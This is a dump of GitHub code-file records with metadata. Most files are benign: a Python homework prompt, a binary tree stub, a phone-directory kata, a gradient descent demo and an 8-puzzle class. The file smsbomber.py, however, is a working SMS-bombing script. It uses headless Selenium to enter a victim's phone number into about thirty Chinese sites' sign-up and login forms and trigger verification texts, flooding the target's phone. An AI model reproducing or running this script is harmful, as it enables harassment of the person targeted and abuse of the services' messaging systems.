blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c946ebf65e15dab1f0d9b98fff4d00ee381324a6
|
2dfc7642e778390b89a40413dbb64f2930b50ceb
|
/class5-functions_and_loops/problem.py
|
496ee84f08f5e1947c5bf45dcafd79373b57a2b6
|
[] |
no_license
|
tsui-david/tzu-chi-cs-class
|
dc740d50fcbdec91ab2be57fa41ebf4bdbc211c2
|
b75b567719ad03d46a42bdc671cad26f6f28e777
|
refs/heads/main
| 2023-03-20T11:37:24.989996
| 2021-03-07T16:20:05
| 2021-03-07T16:20:05
| 307,110,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
"""
Last week we created a program that accepts user input for number
and checks for:
(1) If number is odd, print out "odd"
(2) If number is even, print out "even"
"""
input_num = int(input('Input a number: '))
if input_num % 2 == 0:
print("even")
else:
print("odd")
"""
This week I want you to keep asking the user for numbers and print out even/odd until the user types in "stop"
Todo this I would like the following requirements:
- [ ] Until the user types in "stop" do not exit the code (hint: what allows us to do things over and over again?)
- [ ] Organize the even/odd logic into a function called "getEvenOdd"
- [ ] getEvenOdd will return the string "even" if the argument is even and "odd" if the argument is "odd"
- [ ] use getEvenOdd in your program
"""
|
[
"david.r.tsui@gmail.com"
] |
david.r.tsui@gmail.com
|
f067595b20bc57e3ed96ec100e0903721aaeea6c
|
1e2f1acfee7b707a6cc7cfe0ef48655b2a89fd11
|
/smsbomber.py
|
eef5d18d6c83cb56dad509c85d5c02dd9d39be14
|
[] |
no_license
|
bumzy/smsbomber
|
4431a07188c78bec7c296dadf37910cbe7e57ae8
|
d0c52d7d72b63caf580a505fed359da85dcdc8e4
|
refs/heads/master
| 2021-06-11T07:11:44.841964
| 2019-06-23T05:00:34
| 2019-06-23T05:00:34
| 193,308,016
| 0
| 0
| null | 2021-06-01T23:50:51
| 2019-06-23T04:57:24
|
Python
|
UTF-8
|
Python
| false
| false
| 17,432
|
py
|
# encoding=utf8
import time
from selenium import webdriver
class Bomber(object):
def __init__(self, phone):
self.phone = phone
self.options = webdriver.FirefoxOptions()
self.options.add_argument('--headless') # 后台模式
# 百度
def func0(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.baidu.com/')
browser.find_element_by_xpath('//*[@id="u1"]/a[7]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__footerULoginBtn"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsSwitchWrapper"]').click()
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsPhone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsTimer"]').click()
browser.quit()
# 1号店
def func1(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.yhd.com/passport/register_input.do')
browser.find_element_by_xpath('//*[@id="userName"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click()
browser.quit()
# 中国移动
def func2(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://login.10086.cn/login.html')
browser.find_element_by_xpath('//*[@id="sms_login_1"]').click()
browser.find_element_by_xpath('//*[@id="sms_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="getSMSPwd1"]').click()
browser.quit()
# 51book
def func3(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://caigou.51book.com/caigou/manage/designatedRegistryNewSignon.in')
browser.find_element_by_xpath('//*[@id="cg_06"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendMSgBtu"]').click()
browser.quit()
# 世界邦
def func4(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.shijiebang.com/reg/')
browser.find_element_by_xpath('/html/body/div[1]/div/div[3]/div/ul[1]/li[1]/a').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/div/label[2]/input').click()
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[1]/td/div/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[2]/td/div/button').click()
browser.quit()
# 优酷
def func5(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.youku.com/register.htm')
browser.find_element_by_xpath('//*[@id="passport"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="password"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="repeatPsd"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="getMobileCode"]').click()
browser.quit()
# 亚马逊
def func6(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.amazon.cn/ap/register?_encoding=UTF8&openid.assoc_handle=cnflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.cn%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dnav_custrec_newcust')
# browser.find_element_by_xpath('//*[@id="nav-flyout-ya-newCust"]/a').click()
browser.find_element_by_xpath('//*[@id="ap_customer_name"]').send_keys('Mike998')
browser.find_element_by_xpath('//*[@id="ap_phone_number"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="ap_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ap_register_form"]/div/div/div[5]/div/label/input').click()
browser.find_element_by_xpath('//*[@id="continue"]').click()
browser.quit()
# 私否
def func7(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://segmentfault.com/')
browser.find_element_by_xpath('/html/body/div[2]/nav/div[2]/div[2]/ul/li/a[1]').click()
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[4]/a').click()
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[2]/div[2]/div/div/form/div[2]/div[1]/span/button').click()
browser.quit()
# 中瑞财富
def func8(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.zrcaifu.com/register')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').click()
browser.find_element_by_xpath('//*[@id="register-ul"]/li[3]/input').send_keys('pwd123456')
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms-for-regiter"]').click()
browser.quit()
# 97格格
def func9(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.97gg.net/Account/Register')
browser.find_element_by_xpath('//*[@id="phoneRegistTab"]/tab').click()
browser.find_element_by_xpath('//*[@id="UserName"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="Password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ConfirmPassword"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="chkCodeSendBtn"]').click()
browser.quit()
# 千米
def func10(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.1000.com/reg?us=3W-head')
browser.find_element_by_xpath('//*[@id="react-content"]/div/div/div/div[2]/form/div[2]/div[2]/div/div/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_code"]').click()
browser.quit()
# 唯品会
def func11(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.vip.com/register')
browser.find_element_by_xpath('//*[@id="J_mobile_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="J_mobile_verifycode_btn"]').click()
browser.quit()
# 嗨厨房
def func12(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://m.haichufang.com/reg.html')
browser.find_element_by_xpath('//*[@id="login"]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="login"]/div[2]/div[2]/div[1]').click()
browser.quit()
# 好美家
def func13(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.jaja123.com/web/register')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[2]/div[1]/input').send_keys(u'张飞')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[3]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[4]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[5]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[6]/div[1]/div/span/button').click()
browser.quit()
# 小米
def func14(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://cn.account.xiaomi.com/pass/register?_locale=zh_CN')
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[3]/div[2]/label/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[6]/input').click()
browser.quit()
# 巨人网络
def func15(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://reg.ztgame.com/')
browser.find_element_by_xpath('//*[@id="reg_form"]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_form"]/div[2]/input[2]').click()
browser.quit()
# 微盟
def func16(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.weimob.com/register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="signUpForm"]/div[3]/a').click()
browser.quit()
# 商品宅配
def func17(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.homekoo.com/zhixiao/cuxiao/index.php')
browser.find_element_by_xpath('//*[@id="username5"]').send_keys(u'张飞')
browser.find_element_by_xpath('//*[@id="tel5"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="submit_img5"]').click()
browser.quit()
# 快乐购
def func18(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.happigo.com/register/')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_auth_code"]').click()
browser.quit()
# 手机中国
def func19(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.cnmo.com/register/')
browser.find_element_by_xpath('//*[@id="m_mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="m_uname"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="m_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_confirm"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_getcode"]').click()
browser.quit()
# 苏宁
def func20(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://reg.suning.com/person.do')
browser.find_element_by_xpath('//*[@id="mobileAlias"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendSmsCode"]').click()
browser.quit()
# 爱奇艺
def func21(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.iqiyi.com/iframe/loginreg?is_reg=1&')
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[2]/i').click()
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[1]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/a[2]').click()
browser.quit()
def func22(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.facebank.cn/user.html')
# browser.switch_to.alert()
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="getSmsCode"]').click()
time.sleep(1)
browser.quit()
# 支付宝
def func23(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://memberprod.alipay.com/account/reg/index.htm')
# 焦点问题未解决,支付宝接口无效
browser.quit()
# 粉笔网
def func24(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://fenbi.com/web/signup')
# 弹窗问题,接口无效
browser.quit()
def func25(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://jrh.financeun.com/Login/jrwLogin?web=jrw')
browser.find_element_by_xpath('//*[@id="login-segment-phoneLogin"]').click()
browser.find_element_by_xpath('//*[@id="quickMobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="quickSendMsgCode"]').click()
browser.quit()
def func26(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.maifupay.com/register')
browser.find_element_by_xpath('/html/body/div[2]/div/div[1]/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendVerifySmsButton"]').click()
browser.quit()
def func27(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.ingping.com/reg/index?retUrl=https%3A%2F%2Fwww.ingping.com&fxPid=')
browser.find_element_by_xpath('//*[@id="phoneNum"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendRegMsgA"]').click()
browser.quit()
def func28(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.decathlon.com.cn/zh/create')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="login-button"]').click()
time.sleep(1)
browser.quit()
# 迅雷
def func29(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://vip.xunlei.com/?referfrom=v_pc_qtcp_ggong_xlhy')
# 类似支付宝页面无法解决焦点问题,猜测用JS解决
browser.quit()
def func30(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://my.ruanmei.com/?page=register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms"]').click()
browser.quit()
def func31(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.juhe.cn/register')
browser.find_element_by_xpath('//*[@id="username"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="mobilephone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_smsbtn"]').click()
time.sleep(1)
browser.quit()
def func32(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.zongheng.com/webreg?location=http%3A%2F%2Fwww.zongheng.com%2F')
browser.find_element_by_xpath('//*[@id="regphone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('/html/body/div[3]/div[2]/p[3]/span').click()
browser.quit()
def func33(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://wap.51kid.com/a/free-lesson')
browser.find_element_by_xpath('//*[@id="wechat"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="apply"]/div[3]/div').click()
browser.quit()
|
[
"bumzycm@gmail.com"
] |
bumzycm@gmail.com
|
3d613b080afe7af474f8504d12bf40d8034710ab
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/binaryTree2_20200615152326.py
|
64f23d35b04053fcbead026e6e8a6c7c2d94f816
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 396
|
py
|
# Create a node and assign a value to the node
class Node:
def __init__(self,data):
# designate one node as root
self.data = data
# then the two others as child nodes
self.left = None
self.right = None
# A
def printTree(self):
print(self.data)
root = Node(10)
root.left = Node(2)
root.right = Node(3)
root.printTree()
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
e4d683794d458ed13eab1f94478c4c152a35abfa
|
c885656dc11b4a0becd6bee5ada7ebb7927d090f
|
/Fundamentals/phone_directory.py
|
5eac7c1f4309d7c64a31b0353cf36690f4ef2652
|
[] |
no_license
|
nlpet/codewars
|
804da896cd608ae842442098383a8685a809158c
|
b53a2006a499350d846524f45966dafef035cd71
|
refs/heads/master
| 2021-06-24T08:55:31.663474
| 2017-07-19T11:09:12
| 2017-07-19T11:09:12
| 83,186,729
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,565
|
py
|
r"""
Phone directory problem on codewars.
John keeps a backup of his old personal phone book as a text file. On each line
of the file he can find the phone number (formated as +X-abc-def-ghijwhere X stands
for one or two digits), the corresponding name between < and > and the address.
Unfortunately everything is mixed, things are not always in the same order,
lines are cluttered with non-alpha-numeric characters.
Examples of John's phone book lines:
"/+1-541-754-3010 156 Alphand_St. <J Steeve>\n"
" 133, Green, Rd. <E Kustur> NY-56423 ;+1-541-914-3010!\n"
"<Anastasia> +48-421-674-8974 Via Quirinal Roma\n"
Could you help John with a program that, given the lines of his phone book and a phone
number returns a string for this number : "Phone => num, Name => name, Address => adress"
Examples:
s = "/+1-541-754-3010 156 Alphand_St. <J Steeve>\n 133, Green,
Rd. <E Kustur> NY-56423 ;+1-541-914-3010!\n"
phone(s, "1-541-754-3010") should return "Phone => 1-541-754-3010,
Name => J Steeve, Address => 156 Alphand St."
It can happen that, for a few phone numbers, there are many people
for a phone number -say nb- , then
return : "Error => Too many people: nb"
or it can happen that the number nb is not in the phone book, in that case
return: "Error => Not found: nb"
"""
import re
import sys
sys.path.append('..')
from helpers.test_wrapper import Test
def phone(strng, num):
match_phone = re.findall(num, strng)
found = 0
result = 'Error => Not found: {}'.format(num)
if len(match_phone) == 0:
return result
for line in strng.split('\n'):
match_phone = re.search(num, line)
if match_phone:
name = re.sub(".*<(.*)>.*", "\g<1>", line)
if re.sub(".*<(.*)>.*", "\g<1>", result):
found += 1
clean_line = line.replace(num, '').replace(name, '')
addr = " ".join(re.sub("[^a-zA-Z0-9\.-]", " ", clean_line).split())
result = 'Phone => {}, Name => {}, Address => {}'.format(num, name, addr)
if found > 1:
result = 'Error => Too many people: {}'.format(num)
return result
def run_tests():
with Test() as test:
dr = (
"/+1-541-754-3010 156 Alphand_St. <J Steeve>\n 133, Green, Rd. <E Kustur> NY-56423 ;+1-541-914-3010;\n"
"+1-541-984-3012 <P Reed> /PO Box 530; Pollocksville, NC-28573\n :+1-321-512-2222 <Paul Dive> Sequoia Alley PQ-67209\n"
"+1-741-984-3090 <Peter Reedgrave> _Chicago\n :+1-921-333-2222 <Anna Stevens> Haramburu_Street AA-67209\n"
"+1-111-544-8973 <Peter Pan> LA\n +1-921-512-2222 <Wilfrid Stevens> Wild Street AA-67209\n"
"<Peter Gone> LA ?+1-121-544-8974 \n <R Steell> Quora Street AB-47209 +1-481-512-2222!\n"
"<Arthur Clarke> San Antonio $+1-121-504-8974 TT-45120\n <Ray Chandler> Teliman Pk. !+1-681-512-2222! AB-47209,\n"
"<Sophia Loren> +1-421-674-8974 Bern TP-46017\n <Peter O'Brien> High Street +1-908-512-2222; CC-47209\n"
"<Anastasia> +48-421-674-8974 Via Quirinal Roma\n <P Salinger> Main Street, +1-098-512-2222, Denver\n"
"<C Powel> *+19-421-674-8974 Chateau des Fosses Strasbourg F-68000\n <Bernard Deltheil> +1-498-512-2222; Mount Av. Eldorado\n"
"+1-099-500-8000 <Peter Crush> Labrador Bd.\n +1-931-512-4855 <William Saurin> Bison Street CQ-23071\n"
"<P Salinge> Main Street, +1-098-512-2222, Denve\n"
)
def testing(actual, expected):
test.assert_equals(actual, expected)
test.describe("phone")
test.it("Basic tests")
testing(phone(dr, "48-421-674-8974"), "Phone => 48-421-674-8974, Name => Anastasia, Address => Via Quirinal Roma")
testing(phone(dr, "1-921-512-2222"), "Phone => 1-921-512-2222, Name => Wilfrid Stevens, Address => Wild Street AA-67209")
testing(phone(dr, "1-908-512-2222"), "Phone => 1-908-512-2222, Name => Peter O'Brien, Address => High Street CC-47209")
testing(phone(dr, "1-541-754-3010"), "Phone => 1-541-754-3010, Name => J Steeve, Address => 156 Alphand St.")
testing(phone(dr, "1-121-504-8974"), "Phone => 1-121-504-8974, Name => Arthur Clarke, Address => San Antonio TT-45120")
testing(phone(dr, "1-498-512-2222"), "Phone => 1-498-512-2222, Name => Bernard Deltheil, Address => Mount Av. Eldorado")
testing(phone(dr, "1-098-512-2222"), "Error => Too many people: 1-098-512-2222")
testing(phone(dr, "5-555-555-5555"), "Error => Not found: 5-555-555-5555")
if __name__ == '__main__':
run_tests()
|
[
"schottkey@gmail.com"
] |
schottkey@gmail.com
|
8f5adc4fc685a863c2fb0e954b71e6b597fbc626
|
0ff5a88f42d5e6179583a3251b892b93cf1f6d0d
|
/L1/1_3/1_3_stochastic_gradient_descent.py
|
0eb1234bf20283ced231ac91396577bf9e55c02c
|
[] |
no_license
|
kaz-nakazawa/DL_E_report
|
a6027f6197b061b63fd7cda022ec12dd10b87cf3
|
c3f8ed72d04a2c35c5da075ba5747c8f9c1bea84
|
refs/heads/master
| 2020-06-12T23:49:39.019418
| 2019-07-15T08:29:14
| 2019-07-15T08:29:14
| 194,465,072
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,701
|
py
|
# coding: utf-8
# 確率勾配降下法
import sys, os
sys.path.append(os.pardir) # 親ディレクトリのファイルをインポートするための設定
import numpy as np
from common import functions
import matplotlib.pyplot as plt
def print_vec(text, vec):
print("*** " + text + " ***")
print(vec)
#print("shape: " + str(x.shape))
print("")
# サンプルとする関数
#yの値を予想するAI
def f(x):
y = 3 * x[0] + 2 * x[1]
return y
# 初期設定
def init_network():
# print("##### ネットワークの初期化 #####")
network = {}
nodesNum = 10
network['W1'] = np.random.randn(2, nodesNum)
network['W2'] = np.random.randn(nodesNum)
network['b1'] = np.random.randn(nodesNum)
network['b2'] = np.random.randn()
# print_vec("重み1", network['W1'])
# print_vec("重み2", network['W2'])
# print_vec("バイアス1", network['b1'])
# print_vec("バイアス2", network['b2'])
return network
# 順伝播
def forward(network, x):
# print("##### 順伝播開始 #####")
W1, W2 = network['W1'], network['W2']
b1, b2 = network['b1'], network['b2']
u1 = np.dot(x, W1) + b1
z1 = functions.relu(u1)
## 試してみよう
#z1 = functions.sigmoid(u1)
u2 = np.dot(z1, W2) + b2
y = u2
# print_vec("総入力1", u1)
# print_vec("中間層出力1", z1)
# print_vec("総入力2", u2)
# print_vec("出力1", y)
# print("出力合計: " + str(np.sum(y)))
return z1, y
# 誤差逆伝播
def backward(x, d, z1, y):
# print("\n##### 誤差逆伝播開始 #####")
grad = {}
W1, W2 = network['W1'], network['W2']
b1, b2 = network['b1'], network['b2']
# 出力層でのデルタ
delta2 = functions.d_mean_squared_error(d, y)
# b2の勾配
grad['b2'] = np.sum(delta2, axis=0)
# W2の勾配
grad['W2'] = np.dot(z1.T, delta2)
# 中間層でのデルタ
delta1 = np.dot(delta2, W2.T) * functions.d_relu(z1)
## 試してみよう
# delta1 = np.dot(delta2, W2.T) * functions.d_sigmoid(z1)
delta1 = delta1[np.newaxis, :]
# b1の勾配
grad['b1'] = np.sum(delta1, axis=0)
x = x[np.newaxis, :]
# W1の勾配
grad['W1'] = np.dot(x.T, delta1)
# print_vec("偏微分_重み1", grad["W1"])
# print_vec("偏微分_重み2", grad["W2"])
# print_vec("偏微分_バイアス1", grad["b1"])
# print_vec("偏微分_バイアス2", grad["b2"])
return grad
# サンプルデータを作成
data_sets_size = 100000
data_sets = [0 for i in range(data_sets_size)]
for i in range(data_sets_size):
data_sets[i] = {}
# ランダムな値を設定
data_sets[i]['x'] = np.random.rand(2)
## 試してみよう_入力値の設定
# data_sets[i]['x'] = np.random.rand(2) * 10 -5 # -5〜5のランダム数値
# 目標出力を設定
data_sets[i]['d'] = f(data_sets[i]['x'])
losses = []
# 学習率
learning_rate = 0.07
# 抽出数
epoch = 1000
# パラメータの初期化
network = init_network()
# データのランダム抽出
random_datasets = np.random.choice(data_sets, epoch)
# 勾配降下の繰り返し
for dataset in random_datasets:
x, d = dataset['x'], dataset['d']
z1, y = forward(network, x)
grad = backward(x, d, z1, y)
# パラメータに勾配適用
for key in ('W1', 'W2', 'b1', 'b2'):
network[key] -= learning_rate * grad[key]
# 誤差
loss = functions.mean_squared_error(d, y)
losses.append(loss)
print("##### 結果表示 #####")
lists = range(epoch)
plt.plot(lists, losses, '.')
plt.title('loss')
# グラフの表示
plt.show()
|
[
"noreply@github.com"
] |
kaz-nakazawa.noreply@github.com
|
adc3b4f80abdaf533b97d9b62f5538e55b5a821b
|
9b90373955433cdfa8806373ff343a471a1adcc1
|
/src/algorithms/07-eight-puzzle-game/puzzle.py
|
588dfe7e1d947e7edea11228791b0e78357e64c7
|
[
"MIT"
] |
permissive
|
SamVanhoutte/python-musings
|
0a69f44dc8321792df2a6f57c5821ed52784dcf6
|
18e9b6b366af6c072a5d928f95f30ea88f01f540
|
refs/heads/master
| 2021-07-25T18:39:59.328235
| 2020-05-18T06:41:08
| 2020-05-18T06:41:08
| 171,827,369
| 0
| 0
|
MIT
| 2019-12-24T09:05:16
| 2019-02-21T08:03:45
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,387
|
py
|
from random import shuffle, choice
import numpy as np
import math
class Puzzle:
board = [[]]
depth = 0
_goal = [[1, 2, 3],[4, 0, 5], [6, 7, 8]]
def __init__(self, signature:str = None):
if(signature!=None):
self.board = np.zeros((3, 3), int)
seq = 0
for row in range(0, 3):
for col in range(0, 3):
self.board[row][col] = 0 if signature[seq]==' ' else signature[seq]
seq += 1
else:
#print('Making 200 random moves from the goal state back')
# start from the goal and start randomly moving around 20 times
self.board = np.copy(self._goal)
for _ in range(200) :
move = choice(self.get_available_moves())
self.move_cell(move[0], move[1])
def set_state(self, board):
self.board = board
def __str__(self):
hor_line = '---------------\n'
result = ''
for row in self.board:
for cell in row:
if (cell!=0):
result += '| ' + str(cell) + ' |'
else:
result += '| |'
result += '\n'
return result
def get_open_cell(self):
for row in range(0, 3):
for col in range(0, 3):
if(self.board[row][col]==0):
return row, col
def get_signature(self):
# return unique string to check if state has been used already
result = ''
for row in self.board:
for cell in row:
result += str(cell) if cell != 0 else ' '
return result + ':' + str(self.depth)
def get_available_moves(self):
open_row, open_col = self.get_open_cell()
available_moves = list()
# check horizontal moves
if(open_col-1) >= 0:
available_moves.append((open_row, open_col - 1))
if(open_col+1) < 3:
available_moves.append((open_row, open_col + 1))
# check vertical moves
if(open_row-1) >= 0:
available_moves.append((open_row - 1, open_col))
if(open_row+1) < 3:
available_moves.append((open_row + 1, open_col))
return available_moves
def completed(self):
return (np.array(self.board) == np.array(self._goal)).all()
def move_cell(self,row:int, col:int):
# check if move is valid
open_row, open_col = self.get_open_cell()
self.board[open_row][open_col] = self.board[row][col]
self.board[row][col] = 0
def clone(self):
cloned_puzzle = Puzzle()
cloned_puzzle.set_state(np.copy(self.board))
cloned_puzzle.depth = self.depth
return cloned_puzzle
def evaluate(self, evaluation_method: str = 'fair'):
if(evaluation_method=='good'):
return self._evaluate_nilsson_sequence()
elif(evaluation_method=='fair'):
return self._evaluate_manhattan()
elif(evaluation_method=='weak'):
return self._evaluate_hamming()
